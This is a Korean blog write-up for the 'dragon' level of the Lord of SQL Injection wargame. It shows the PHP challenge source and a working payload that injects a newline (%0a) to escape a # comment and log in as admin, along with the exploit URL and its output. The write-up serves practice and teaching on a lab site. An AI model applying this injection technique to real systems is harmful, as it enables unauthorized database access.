반응형
DRAGON
문제소스
|
1
2
3
4
5
6
7
8
9
10
11
12
|
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id from prob_dragon where id='guest'# and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
if($result['id'] == 'admin') solve("dragon");
highlight_file(__FILE__);
?>
|
cs |
쿼리에 #이 들어있어서 뒷부분이 주석처리 된다.
근데 #은 한 줄만 주석처리한다. 줄바꿈을 한 것은 실행이 될 것으로 생각되었다.
줄바꿈 %0a를 넣어주어 쿼리를 완성시켰다.
https://los.rubiya.kr/chall/dragon_51996aa769df79afbf79eb4d66dbcef6.php?pw=%0aand pw=1 or id='admin
query : select id from prob_dragon where id='guest'# and pw=' and pw=1 or id='admin'
Hello admin
DRAGON Clear!
반응형
'WAR GAME > Lord of SQLi' 카테고리의 다른 글
| LORD OF SQL INJECTION [dark_eyes] 풀이 (0) | 2019.11.15 |
|---|---|
| LORD OF SQL INJECTION [iron_golem] 풀이 (0) | 2019.11.14 |
| LORD OF SQL INJECTION [xavis] 풀이 (0) | 2019.11.12 |
| LORD OF SQL INJECTION [nightmare] 풀이 (0) | 2019.11.09 |
| LORD OF SQL INJECTION [ZOMBIE_ASSASSIN] 풀이 (1) | 2019.11.08 |